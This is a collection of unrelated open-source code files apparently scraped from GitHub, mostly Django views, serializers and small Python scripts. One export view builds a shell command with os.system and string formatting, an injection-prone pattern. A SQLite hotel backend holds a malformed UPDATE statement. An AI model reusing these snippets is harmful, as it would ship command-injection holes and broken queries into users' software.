form.cleaned_data['revision'].apply()\n        history = reverse('projects_file_history', args=[project.slug, file.pk])\n        return HttpResponseRedirect(history)\n    \n    return object_list(\n        request,\n        queryset=file.revisions.all(),\n        extra_context={'project': project, 'file': file, 'form': form},\n        page=int(request.GET.get('page', 1)),\n        template_object_name='revision',\n        template_name='projects/file_history.html',\n    )\n\n@login_required\ndef file_diff(request, project_slug, file_id, from_id, to_id):\n    \"\"\"\n    Return the diff and contents of a given revision.\n    \"\"\"\n    project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n    file = get_object_or_404(project.files.live(), pk=file_id)\n\n    # grab the requested revisions\n    from_rev = get_object_or_404(file.revisions.all(), pk=from_id)\n    to_rev = get_object_or_404(file.revisions.all(), pk=to_id)\n\n    # generate a pretty html diff\n    diff = file.get_html_diff(from_rev.revision_number, to_rev.revision_number)\n    contents = linebreaks(to_rev.get_file_content())\n\n    payload = {\n        'diff': diff,\n        'contents': contents,\n        'display': str(to_rev),\n    }\n\n    # return it assuming json\n    return HttpResponse(simplejson.dumps(payload), mimetype='text/javascript')\n\n@login_required\ndef file_preview(request):\n    \"\"\"\n    Live preview of restructuredtext payload - currently not wired up\n    \"\"\"\n    f = File(\n        heading=request.POST['heading'],\n        content=request.POST['content'],\n    )\n    rendered_base = render_to_string('projects/doc_file.rst.html', {'file': f})\n    rendered = restructuredtext(rendered_base)\n    \n    json_response = simplejson.dumps({'payload': rendered})\n    return HttpResponse(json_response, mimetype='text/javascript')\n\n@login_required\ndef export(request, project_slug):\n    \"\"\"\n    Export a projects' docs as a .zip file, including the .rst source\n    \"\"\"\n    project = Project.objects.live().get(user=request.user, slug=project_slug)\n    os.chdir(project.user_doc_path)\n    dir_path = os.path.join(settings.MEDIA_ROOT, 'export', project.user.username)\n    file_path = os.path.join(dir_path, '%s.zip' % project.slug)\n    try:\n        os.makedirs(dir_path)\n    except OSError:\n        #Directory already exists\n        pass\n    os.system('zip -r %s *' % file_path)\n    return HttpResponseRedirect(os.path.join(settings.MEDIA_URL, 'export', project.user.username, '%s.zip' % project.slug))\n","repo_name":"chrisdickinson/tweezers","sub_path":"projects/views/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":9684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75147433128","text":"import math; inf= 1e18; mod =10**9+7\n\nclass Solution:\n    def kidsWithCandies(self, candies, extraCandies: int):\n        m = candies[0]\n        for i in range(1,len(candies)):\n            if(candies[i]>m):\n                m=candies[i]\n\n        for i in range(len(candies)): \n            if(candies[i]+extraCandies>=m):\n                candies[i]=True\n            else:\n                candies[i]=False\n        return candies","repo_name":"its-sachin/LeetCode","sub_path":"Random/q1431.py","file_name":"q1431.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"4488551529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('accounts', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Funcionario',\n            fields=[\n                ('user_ptr', 
models.OneToOneField(primary_key=True, parent_link=True, serialize=False, auto_created=True, to=settings.AUTH_USER_MODEL)),\n                ('salario', models.DecimalField(verbose_name='Salário', blank=True, max_digits=6, decimal_places=2)),\n                ('funcao', models.CharField(verbose_name='Funçao', max_length=45, blank=True)),\n            ],\n            options={\n                'verbose_name_plural': 'Funcionários',\n                'verbose_name': 'Funcionário',\n                'ordering': ['username'],\n            },\n            bases=('accounts.user',),\n        ),\n    ]\n","repo_name":"wl4dek/pbd","sub_path":"pbd/funcionario/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15656990306","text":"def addScore(name, score):\n    file = open('scores.txt', 'a')\n    file.write(name + ',' + str(score) + '\\n')\n    file.close()\n\ndef getSortedLeaders():\n    with open('scores.txt', 'r') as score_file:\n        score_list = []\n        \n        for line in score_file:\n            name,score = line.strip().split(',')\n            score_list.append({\"name\":name, \"score\":int(score)})\n        sorted_leaderboard = sorted(score_list, key=lambda x:x['score'], reverse=True)\n        return sorted_leaderboard\n    \ndef printLeaderboard():\n    sorted_leaderboard = getSortedLeaders()\n    for entry in sorted_leaderboard:\n        print(entry['name'] + \" - \" + str(entry['score']))","repo_name":"Gage-Giovanni/cpsc462-word-attack","sub_path":"leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72084551528","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\nfrom homeservice_app.forms import Stock,seedform,plantform,fertilizerform,SchdeuleForm\nfrom homeservice_app.models import Farmer, Nursery , Addproduct,weather,seed,plant,fertilizer,Announcement,Worker,Schedule,Bill,Appointment\n# NOTE: SchdeuleForm, Worker, Schedule, Bill and Appointment were referenced below without being\n# imported; they are assumed to be defined in the same forms/models modules as the other imports.\n\n\n\ndef worker_home(request):\n    return render(request, 'workertemp/worker_home.html')\n\n\n@login_required(login_url='login_view')\ndef schedule_add(request):\n    form = SchdeuleForm()\n    if request.method == 'POST':\n        form = SchdeuleForm(request.POST)\n        if form.is_valid():\n            form=form.save(commit=False)\n            form.employee=Worker.objects.get(user=request.user)\n            form.save()\n            messages.info(request, 'schedule added successfully')\n            return redirect('schedule_views')\n    return render(request, 'workertemp/schedule_add.html', {'form': form})\n\n\n@login_required(login_url='login_view')\ndef schedule_view(request):\n    u=Worker.objects.get(user=request.user)\n    print(u)\n    s = Schedule.objects.filter(employee=u)\n    print(s)\n    context = {\n        'schedule': s\n    }\n    return render(request, 'workertemp/schedule_view.html', context)\n\n\n@login_required(login_url='login_view')\ndef schedule_update(request, id):\n    s = Schedule.objects.get(id=id)\n    if request.method == 'POST':\n        form = SchdeuleForm(request.POST or None, instance=s)\n        if form.is_valid():\n            form.save()\n            messages.info(request, 'schedule updated')\n            return redirect('schedule_views')\n    else:\n        form = SchdeuleForm(instance=s)\n    return render(request, 'workertemp/schedule_update.html', {'form': form})\n\n\n@login_required(login_url='login_view')\ndef schedule_delete(request, id):\n    s = Schedule.objects.filter(id=id)\n    if request.method == 'POST':\n        s.delete()\n        return redirect('schedule_views')\n\ndef view_bill_worker(request):\n    bill = Bill.objects.all()\n    print(bill)\n    return render(request, 
'workertemp/view_payment_details.html', {'bills': bill})\n\n@login_required(login_url='login_view')\ndef appointment_view_worker(request):\n a = Appointment.objects.all()\n return render(request, 'workertemp/appointment_view.html', {'appointment': a})\n\n\ndef stockpage(request):\n stock_form = Stock()\n if request.method == 'POST':\n stock_form = Stock(request.POST, request.FILES)\n if stock_form.is_valid():\n stock_form.save()\n messages.info(request, 'Prescription generated')\n return redirect(worker_home)\n return render(request,'workertemp/add_stock.html',{'stock_form': stock_form})\n\n\ndef view_stock(request):\n data = seed.objects.all()\n data1 = plant.objects.all()\n data2 = fertilizer.objects.all()\n return render(request, 'workertemp/view_stock.html', {'data': data,'data1':data1,'data2':data2})\n\ndef update_seed(request, id):\n data = seed.objects.get(id=id)\n form = seedform(instance=data)\n if request.method == 'POST':\n form = seedform(request.POST, instance=data)\n if form.is_valid():\n form.save()\n return redirect('view_stock')\n return render(request, 'workertemp/update_stock.html', {'form': form})\n\n\ndef remove_seed(request, id):\n data = seed.objects.get(id=id)\n data.delete()\n return redirect('view_stock')\n\ndef update_plant(request, id):\n data = plant.objects.get(id=id)\n form = plantform(instance=data)\n if request.method == 'POST':\n form = plantform(request.POST, instance=data)\n if form.is_valid():\n form.save()\n return redirect('view_stock')\n return render(request, 'workertemp/update_stock.html', {'form': form})\n\n\ndef remove_plant(request, id):\n data = plant.objects.get(id=id)\n data.delete()\n return redirect('view_stock')\n\ndef update_fertilizer(request, id):\n data = fertilizer.objects.get(id=id)\n form = fertilizerform(instance=data)\n if request.method == 'POST':\n form = fertilizerform(request.POST, instance=data)\n if form.is_valid():\n form.save()\n return redirect('view_stock')\n return render(request, 'workertemp/update_stock.html', {'form': form})\n\n\ndef remove_fertilizer(request, id):\n data = fertilizer.objects.get(id=id)\n data.delete()\n return redirect('view_stock')\n\n\ndef seedpage(request):\n seed_form = seedform()\n if request.method == 'POST':\n seed_form = seedform(request.POST, request.FILES)\n if seed_form.is_valid():\n seed_form.save()\n messages.info(request, 'product added')\n return redirect(worker_home)\n return render(request,'workertemp/add_seed.html',{'seed_form': seed_form})\n\n\ndef plantpage(request):\n plant_form = plantform()\n if request.method == 'POST':\n plant_form = plantform(request.POST, request.FILES)\n if plant_form.is_valid():\n plant_form.save()\n messages.info(request, 'product added')\n return redirect(worker_home)\n return render(request,'workertemp/add_plant.html',{'plant_form': plant_form})\n\n\ndef fertilizerpage(request):\n fertilizer_form = fertilizerform()\n if request.method == 'POST':\n fertilizer_form = fertilizerform(request.POST, request.FILES)\n if fertilizer_form.is_valid():\n fertilizer_form.save()\n messages.info(request, 'product added')\n return redirect(worker_home)\n return render(request,'workertemp/add_fertilizer.html',{'fertilizer_form': fertilizer_form})\n\ndef weatherdetails2(request):\n data = weather.objects.all()\n return render(request,'workertemp/weathernursery.html',{'data':data})\n\ndef view_announcecustomets(request):\n content=Announcement.objects.all()\n return 
render(request,'workertemp/announce_view.html',{'content':content})","repo_name":"aadarshps3/stack_athul","sub_path":"homeservice_app/workerviews.py","file_name":"workerviews.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"27364464855","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pkg import *\nplt.figure(figsize=(8,6))\nconsistent = ('complete match','basically consistent',\n\t\t\t'a little contact', 'does not match')\nx_pos = np.arange(len(consistent))\nperformance = [4.59,31.19,46.79,17.43]\n\nret = plt.bar(x_pos,performance,0.35,color='r',align='center',alpha=0.8)\nplt.xticks(x_pos,consistent)\nplt.ylabel('percentage (%)')\nplt.title('Work and professional consistency')\nautolabel(ret)\nplt.show()\n","repo_name":"daozl/james","sub_path":"code/bar/consistent.py","file_name":"consistent.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4005239118","text":"#Backend\r\n\r\nimport sqlite3\r\n\r\ndef hotelData():\r\n    con = sqlite3.connect(\"booking.db\")\r\n    cur = con.cursor()\r\n    cur.execute(\"CREATE TABLE IF NOT EXISTS booking (id INTEGER PRIMARY KEY, CusID text,Firstname text,Surname text, \\\r\n    Address text, Gender text,Mobile text,Nationality text,ProveOfID text,DateIn text,DateOut text,Email text)\")\r\n    con.commit()\r\n    con.close()\r\n\r\ndef addHotelRec(CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email):\r\n    con=sqlite3.connect(\"booking.db\")\r\n    cur = con.cursor()\r\n    cur.execute(\"INSERT INTO booking VALUES (NULL,?,?,?,?,?,?,?,?,?,?,?)\", \\\r\n    (CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email))\r\n    con.commit()\r\n    con.close()\r\n\r\ndef viewData():\r\n    con=sqlite3.connect(\"booking.db\")\r\n    cur = con.cursor()\r\n    cur.execute(\"SELECT * FROM booking\")\r\n    rows=cur.fetchall()\r\n    con.close()\r\n    return rows\r\n\r\ndef deleteRec(id):\r\n    con=sqlite3.connect(\"booking.db\")\r\n    cur = con.cursor()\r\n    cur.execute(\"DELETE FROM booking WHERE id=?\", (id,))\r\n    con.commit()\r\n    con.close()\r\n\r\ndef searchData(CusID=\"\", Firstname=\"\",Surname=\"\",Address=\"\", Gender=\"\",Mobile=\"\", Nationality=\"\", ProveOfID=\"\", DateIn=\"\", DateOut=\"\", Email=\"\"):\r\n    con=sqlite3.connect(\"booking.db\")\r\n    cur = con.cursor()\r\n    cur.execute(\"SELECT * FROM booking WHERE CusID=? OR Firstname=? OR Surname=? OR Address=? OR Gender=? OR Mobile=? \\\r\n    OR Nationality=? OR ProveOfID=? OR DateIn=? OR DateOut=? OR Email=? 
\", \\\r\n (CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email))\r\n rows=cur.fetchall() \r\n con.close()\r\n return rows \r\n \r\ndef dataUpdate(id,CusID=\"\", Firstname=\"\",Surname=\"\",Address=\"\", Gender=\"\",Mobile=\"\", Nationality=\"\", ProveOfID=\"\", DateIn=\"\", DateOut=\"\", Email=\"\"):\r\n con=sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"UPDATE hotel SET CusID=?, Firstname=?,Surname=?,Address=?, Gender=?, Mobile=?, Nationality=?, \\\r\n ProveOfID=?,DateIn=?,DateOut=?,Email,WHERE id=?\", \\\r\n (CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email,id))\r\n con.commit()\r\n con.close()\r\n\r\nhotelData()\r\n\r\n \r\n\r\n","repo_name":"Shubam29/Hotel","sub_path":"Databasehotel.py","file_name":"Databasehotel.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24772754697","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndt = pd.read_csv('datasets/dataset_train.csv')\ncourses_name = dt.drop(['Index', 'Hogwarts House', 'First Name', 'Last Name', 'Birthday', 'Best Hand'], axis=1).columns\ncourses = dt.drop(['Index', 'Hogwarts House', 'First Name', 'Last Name', 'Birthday', 'Best Hand'], axis=1)\ncorr_matrix = courses.corr()\nhouses_names = dt['Hogwarts House'].unique()\nindexes = []\nfor course in courses_name:\n abs_corr_matr = np.absolute(corr_matrix[course]).drop(course)\n if len(abs_corr_matr[np.round(abs_corr_matr, 3) == 1].index):\n if course not in indexes:\n cor_course = abs_corr_matr[np.round(abs_corr_matr, 3) == 1].index[0]\n indexes.extend([cor_course, course])\n for house in houses_names:\n x = dt[dt['Hogwarts House'] == house][course].dropna().to_numpy()\n plt.scatter(courses[course], courses[cor_course], alpha=0.2, label=house)\n plt.legend()\n plt.xlabel(course)\n plt.ylabel(cor_course)\n plt.grid()\n plt.show()\n","repo_name":"danlee65071/dslr","sub_path":"scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17182360140","text":"class Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n\n stack = []\n current = head\n\n while current:\n stack.append(current.val)\n current = current.next\n\n l, r = 0, len(stack)-1\n\n while l < r :\n\n if stack[l] != stack[r]:\n return False\n \n l += 1\n r -= 1\n \n return True","repo_name":"addisumotora/competitive_programming","sub_path":"palendromelinkedlist.py","file_name":"palendromelinkedlist.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4081508693","text":"import torch\nimport torch.nn as nn\nfrom pvdet.tools.config import cfg\nfrom functools import partial\nimport spconv\nfrom pvdet.model.model_utils.restnet_utils import SparseBasicBlock\nfrom pvdet.tools.utils import loss_utils\nimport torch.nn.functional as F\nimport time\nclass UNetHead(nn.Module):\n def __init__(self, unet_target_cfg):\n super().__init__()\n self.gt_extend_width = unet_target_cfg.GT_EXTEND_WIDTH\n if 'MEAN_SIZE' in unet_target_cfg:\n self.mean_size = unet_target_cfg.MEAN_SIZE\n\n\nclass UNetV2(UNetHead):\n def __init__(self, input_channels, **kwargs):\n super().__init__(unet_target_cfg=cfg.MODEL.RPN.BACKBONE.TARGET_CONFIG)\n self.print_info = 
cfg.print_info\n norm_fn = partial(nn.BatchNorm1d, eps=1e-3, momentum=0.01)\n\n self.conv_input = spconv.SparseSequential(\n spconv.SubMConv3d(input_channels, 16, 3, padding=1, bias=False, indice_key='subm1'),\n norm_fn(16),\n nn.ReLU(),\n )\n block = self.post_act_block\n\n self.conv1 = spconv.SparseSequential(\n block(16, 16, 3, norm_fn=norm_fn, padding=1, indice_key='subm1'),\n )\n\n self.conv2 = spconv.SparseSequential(\n # [1600, 1408, 41] <- [800, 704, 21]\n block(16, 32, 3, norm_fn=norm_fn, stride=2, padding=1, indice_key='spconv2', conv_type='spconv'),\n block(32, 32, 3, norm_fn=norm_fn, padding=1, indice_key='subm2'),\n block(32, 32, 3, norm_fn=norm_fn, padding=1, indice_key='subm2'),\n )\n\n self.conv3 = spconv.SparseSequential(\n # [800, 704, 21] <- [400, 352, 11]\n block(32, 64, 3, norm_fn=norm_fn, stride=2, padding=1, indice_key='spconv3', conv_type='spconv'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm3'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm3'),\n )\n\n self.conv4 = spconv.SparseSequential(\n # [400, 352, 11] <- [200, 176, 5]\n block(64, 64, 3, norm_fn=norm_fn, stride=2, padding=(0, 1, 1), indice_key='spconv4', conv_type='spconv'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm4'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm4'),\n )\n\n last_pad = 0 if cfg.DATA_CONFIG.VOXEL_GENERATOR.VOXEL_SIZE[-1] in [0.1, 0.2] else (1, 0, 0)\n\n self.conv_out = spconv.SparseSequential(\n # [200, 150, 5] -> [200, 150, 2]\n spconv.SparseConv3d(64, 128, (3, 1, 1), stride=(2, 1, 1), padding=last_pad,\n bias=False, indice_key='spconv_down2'),\n norm_fn(128),\n nn.ReLU(),\n )\n self.num_point_features = 128\n\n\n\n def post_act_block(self, in_channels, out_channels, kernel_size, indice_key, stride=1, padding=0,\n conv_type='subm', norm_fn=None):\n if conv_type == 'subm':\n m = spconv.SparseSequential(\n spconv.SubMConv3d(in_channels, out_channels, kernel_size, bias=False, indice_key=indice_key),\n norm_fn(out_channels),\n nn.ReLU(),\n )\n elif conv_type == 'spconv':\n m = spconv.SparseSequential(\n spconv.SparseConv3d(in_channels, out_channels, kernel_size, stride=stride, padding=padding,\n bias=False, indice_key=indice_key),\n norm_fn(out_channels),\n nn.ReLU(),\n )\n elif conv_type == 'inverseconv':\n m = spconv.SparseSequential(\n spconv.SparseInverseConv3d(in_channels, out_channels, kernel_size,\n indice_key=indice_key, bias=False),\n norm_fn(out_channels),\n nn.ReLU(),\n )\n else:\n raise NotImplementedError\n return m\n\n def forward(self, input_sp_tensor, **kwargs):\n \"\"\"\n :param voxel_features: (N, C)\n :param coors: (N, 4) [batch_idx, z_idx, y_idx, x_idx], sparse_shape: (z_size, y_size, x_size)\n :param batch_size:\n :return:\n \"\"\"\n start = time.time()\n x = self.conv_input(input_sp_tensor)\n\n x_conv1 = self.conv1(x)\n x_conv2 = self.conv2(x_conv1)\n x_conv3 = self.conv3(x_conv2)\n x_conv4 = self.conv4(x_conv3)\n\n # for detection head\n # [200, 176, 5] -> [200, 176, 2]\n out = self.conv_out(x_conv4)\n spatial_features = out.dense()\n\n N, C, D, H, W = spatial_features.shape\n spatial_features = spatial_features.view(N, C * D, H, W)\n\n ret_dict = {'spatial_features': spatial_features,\n \"num_bev_features\":C*D,\n \"spatial_features_stride\":8}\n\n\n ret_dict[\"encoded_spconv_tensor\"] = out\n ret_dict[\"encoded_spconv_tensor_stride\"] = 8\n ret_dict[\"multi_scale_3d_features\"] = {\n 'x_conv1': x_conv1,\n 'x_conv2': x_conv2,\n 'x_conv3': x_conv3,\n 'x_conv4': x_conv4,\n }\n if 
self.print_info:\n            print(\"sparse conv3d spent time \",(time.time()-start)/N)\n        self.forward_ret_dict = ret_dict\n\n        return ret_dict\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"liangzhao123/IOU-SSD","sub_path":"pvdet/model/RPN/rpn_unet.py","file_name":"rpn_unet.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"37016790107","text":"from graphics import *\nfrom math import *\ndef gobangwin():\n    win=GraphWin(\"this is a gobang game\",400,400)    #make the 21x21 game board\n    win.setBackground(\"yellow\")\n    i1=0\n    \n    while i1<401:\n        l=Line(Point(i1,0),Point(i1,400))\n        l.draw(win)\n        i1=i1+20\n    i2=0\n    \n    while i2<401:\n        l=Line(Point(0,i2),Point(400,i2))\n        l.draw(win)\n        i2=i2+20\n    return win\n    \n    \ndef main():\n    win = gobangwin()\n    \n    \n    list1 = []\n    list2 = []\n    list3 = []\n    \n    change = 0\n    g = 0\n    m=0\n    n=0\n    \n    while g == 0:\n        \n        if change%2 == 1:\n            p1 = win.getMouse()\n            if not ((round((p1.getX()+10)/20),round((p1.getY()+10)/20)) in list3):\n                \n                a1 = round((p1.getX()+10)/20)\n                b1 = round((p1.getY()+10)/20)\n                list1.append((a1,b1))\n                list3.append((a1,b1))\n                \n                piece = Circle(Point(20*a1,20*b1),8)    #create a piece\n                piece.setFill('white')\n                piece.draw(win)\n                for m in range(21):    #check for a win\n                    for n in range(21):\n                        \n                        if n<17 and (m,n) in list1 and (m,n+1) in list1 and (m,n+2) in list1 and (m,n+3) in list1 and (m,n+4) in list1 :\n                            message = Text(Point(100,100),\"white win.\")\n                            message.draw(win)\n                            g = 1    #white wins on a vertical line\n                        elif m<17 and (m,n) in list1 and (m+1,n) in list1 and (m+2,n) in list1 and (m+3,n) in list1 and (m+4,n) in list1 :\n                            message = Text(Point(100,100),\"white win.\")\n                            message.draw(win)\n                            g = 1    #white wins on a horizontal line\n                        elif m<17 and n<17 and (m,n) in list1 and (m+1,n+1) in list1 and (m+2,n+2) in list1 and (m+3,n+3) in list1 and (m+4,n+4) in list1 :\n                            message = Text(Point(100,100),\"white win.\")\n                            message.draw(win)\n                            g = 1    #white wins on a diagonal line\n                        elif m<17 and n>3 and (m,n) in list1 and (m+1,n-1) in list1 and (m+2,n-2) in list1 and (m+3,n-3) in list1 and (m+4,n-4) in list1 :\n                            message = Text(Point(100,100),\"white win.\")\n                            message.draw(win)\n                            g = 1    #white wins on the other diagonal\n                        else: change = change+1    #switch to black's move\n        \n        else:\n            p2 = win.getMouse()\n            if not ((round((p2.getX()+10)/20),round((p2.getY()+10)/20)) in list3):\n                \n                a2 = round((p2.getX()+10)/20)\n                b2 = round((p2.getY()+10)/20)\n                list2.append((a2,b2))\n                list3.append((a2,b2))\n                \n                piece = Circle(Point(20*a2,20*b2),8)\n                piece.setFill('black')\n                piece.draw(win)\n                for m in range(21):\n                    for n in range(21):\n                        \n                        if n<17 and (m,n) in list2 and (m,n+1) in list2 and (m,n+2) in list2 and (m,n+3) in list2 and (m,n+4) in list2 :\n                            message = Text(Point(100,100),\"black win.\")\n                            message.draw(win)\n                            g = 1    #black wins on a vertical line\n                        elif m<17 and (m,n) in list2 and (m+1,n) in list2 and (m+2,n) in list2 and (m+3,n) in list2 and (m+4,n) in list2 :\n                            message = Text(Point(100,100),\"black win.\")\n                            message.draw(win)\n                            g = 1    #black wins on a horizontal line\n                        elif m<17 and n<17 and (m,n) in list2 and (m+1,n+1) in list2 and (m+2,n+2) in list2 and (m+3,n+3) in list2 and (m+4,n+4) in list2 :\n                            message = Text(Point(100,100),\"black win.\")\n                            message.draw(win)\n                            g = 1    #black wins on a diagonal line\n                        elif m<17 and n>3 and (m,n) in list2 and (m+1,n-1) in list2 and (m+2,n-2) in list2 and (m+3,n-3) in list2 and (m+4,n-4) in list2 :\n                            message = Text(Point(100,100),\"black win.\")\n                            message.draw(win)\n                            g = 1    #black wins on the other diagonal\n                        else: change = change+1    #switch to white's move\n    \n    message = Text(Point(100,120),\"Click anywhere to quit.\")\n    message.draw(win)\n    
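# keep the final board on screen until one more click, then close the window\n    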
win.getMouse()\n win.close()\n \n \n \nmain()","repo_name":"chocoluffy/python-projects","sub_path":"python项目7-五子棋/five.py","file_name":"five.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30163272664","text":"import logging\nfrom typing import List, Tuple\n\nfrom wordle.config import MAX_ATTEMPTS, SYMBOL_MATCH\nfrom wordle.game import Wordle\nfrom wordle.strategy import Strategy, StrategyError\n\n\nclass Player:\n def __init__(self, game: Wordle, strategy: Strategy):\n if game is None or strategy is None:\n raise ValueError(\"game and strategy cannot be None\")\n self._game = game\n self.strategy = strategy\n\n def play(self) -> Tuple[List[str], List[str]]:\n guesses = []\n feedback = []\n self.strategy.reset()\n for i in range(MAX_ATTEMPTS):\n\n try:\n g = self.strategy.guess()\n except StrategyError as e:\n logging.error(e)\n break\n fb = self._game.evaluate(g)\n\n guesses.append(g)\n feedback.append(fb)\n\n logging.debug(\"guess %d: %s -> %s\", i, g, fb)\n\n if fb == SYMBOL_MATCH * 5:\n logging.debug(\"Found the word: %s\", g)\n return guesses, feedback\n\n self.strategy.update(g, fb)\n\n logging.debug(\"Word not found: %s\", self._game.get_secret())\n return guesses, feedback\n","repo_name":"marcotinacci/wordle","sub_path":"wordle/player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"4635113419","text":"MSG_KIND_NORMAL = 'danmaku'\nMSG_KIND_GIFT = 'gift'\nMSG_KIND_GUARD = 'guard'\nMSG_KIND_SUPER_CHAT = 'super-chat'\nMSG_KIND_INTERACT_WORD = 'interact-word'\nMSG_KIND_ENTRY_EFFECT = 'entry-effect'\nMSG_KIND_BATTLE_START = 'battle-start'\nMSG_KIND_BATTLE_END = 'battle-end'\nMSG_KIND_BATTLE_SETTLE = 'battle-settle'\n\nBODY_ADDON_KEY_ROOM_ID = 'recording_room_id'\n\nDB_COL_PK = 'id'\nDB_COL_TIME = 'recv_time'\nDB_COL_HASH = 'unique_data_hash'\nDB_COL_TYPE = 'type'\nDB_COL_CONTENT = 'message_content'\n","repo_name":"GongT/bilibili-live-danmaku-recorder","sub_path":"src/mylib/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"23216102808","text":"\"\"\"Teacher serializer.\"\"\"\r\n\r\n# Django\r\nfrom django.shortcuts import get_object_or_404\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\n\r\n# Django REST Framework\r\nfrom rest_framework import serializers\r\n\r\n# Models\r\nfrom api.users.models import (\r\n User,\r\n Subscription\r\n)\r\nfrom api.programs.models import (\r\n ProgramTopic,\r\n VideoTopic,\r\n PodcastTopic,\r\n PlaylistTopic\r\n\r\n)\r\n\r\n# Serializes\r\nfrom .videos import VideoModelSerializer\r\n\r\n# Utils\r\nfrom datetime import timedelta\r\n\r\n\r\nclass ProgramTopicModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n videos = serializers.SerializerMethodField(read_only=True)\r\n playlists = serializers.SerializerMethodField(read_only=True)\r\n podcasts = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = ProgramTopic\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'name',\r\n 'picture',\r\n 'videos',\r\n 'playlists',\r\n 'podcasts',\r\n 'color',\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n def get_videos(self, obj):\r\n videos = 
VideoTopic.objects.filter(topic=obj.id).count()\r\n        return videos\r\n\r\n    def get_podcasts(self, obj):\r\n        podcasts = PodcastTopic.objects.filter(topic=obj.id).count()\r\n        return podcasts\r\n\r\n    def get_playlists(self, obj):\r\n        playlists = PlaylistTopic.objects.filter(topic=obj.id).count()\r\n        return playlists\r\n\r\n\r\nclass ProgramTopicCreateSerializer(serializers.ModelSerializer):\r\n    \"\"\"Profile model serializer.\"\"\"\r\n    class Meta:\r\n        \"\"\"Meta class.\"\"\"\r\n\r\n        model = ProgramTopic\r\n        fields = (\r\n            'id',\r\n        )\r\n\r\n        read_only_fields = (\r\n            'id',\r\n        )\r\n\r\n    def create(self, validated_data):\r\n\r\n        user = self.context['request'].user\r\n        validated_data['user'] = user\r\n        validated_data['teacher'] = user.teacher\r\n\r\n        program = self.context['program']\r\n        validated_data['program'] = program\r\n\r\n        return super().create(validated_data)\r\n\r\n\r\nclass ProgramTopicModifyModelSerializer(serializers.ModelSerializer):\r\n    \"\"\"Profile model serializer.\"\"\"\r\n    videos = serializers.SerializerMethodField(read_only=True)\r\n    playlists = serializers.SerializerMethodField(read_only=True)\r\n    podcasts = serializers.SerializerMethodField(read_only=True)\r\n\r\n    class Meta:\r\n        \"\"\"Meta class.\"\"\"\r\n\r\n        model = ProgramTopic\r\n        fields = (\r\n            'id',\r\n            'code',\r\n            'name',\r\n\r\n            'picture',\r\n            'videos',\r\n            'playlists',\r\n            'podcasts',\r\n            'color',\r\n        )\r\n\r\n        read_only_fields = (\r\n            'id',\r\n        )\r\n\r\n    def get_videos(self, obj):\r\n        videos = VideoTopic.objects.filter(topic=obj.id).count()\r\n        return videos\r\n\r\n    def get_playlists(self, obj):\r\n        playlists = PlaylistTopic.objects.filter(topic=obj.id).count()\r\n        return 